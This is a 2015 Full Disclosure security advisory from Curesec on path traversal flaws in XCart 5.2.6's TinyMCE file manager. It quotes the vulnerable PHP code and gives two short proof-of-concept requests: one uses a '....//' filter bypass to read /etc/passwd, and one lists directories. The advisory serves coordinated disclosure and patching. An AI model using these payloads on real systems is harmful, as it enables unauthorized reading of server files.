Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

XCart 5.2.6: Path Traversal

From: "Curesec Research Team (CRT)" <crt () curesec com>
Date: Fri, 13 Nov 2015 16:51:17 +0100
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    XCart 5.2.6
Fixed in:            5.2.7
Fixed Version Link:  https://www.x-cart.com/xc5kit
Vendor Contact:      support () x-cart com
Vulnerability Type:  Path Traversal
Remote Exploitable:  Yes
Reported to vendor:  08/13/2015
Disclosed to public: 11/04/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Arbitrary File Download

Description

When downloading a file, the input is not properly protected against directory
traversal, which makes it possible to download arbitrary files.

Please note that admin credentials are required.

Proof of Concept


http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php
POST: path=/....//....//....//....//....//....//....//....//..etc/passwd&name=download.txt

Code


/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10
$path=joinPaths($root,$upload_dir,$_POST['path']);
$path=str_replace(LC_DS . '..', '', $path);
$name=$_POST['name'];

header('Pragma: private');
header('Cache-control: private, must-revalidate');
header("Content-Type: application/octet-stream");
header("Content-Length: " .(string)(filesize($path)) );
header('Content-Disposition: attachment; filename="'.($name).'"');
readfile($path);

3. List Directories

Description

It is possible to list the directories contained by any directory due to a
directory traversal vulnerability via the fldr POST argument. This may be used
to gather information about the target system.

Please note that admin credentials are required.

Proof of Concept


http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../

4. Solution

To mitigate this issue please upgrade at least to version 5.2.7:

https://www.x-cart.com/xc5kit

Please note that a newer version might already be available.

5. Report Timeline

08/13/2015 Informed Vendor about Issue
09/03/2015 Vendor Requests more time
10/19/2015 Vendor releases fix
11/04/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Path-Traversal-85.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: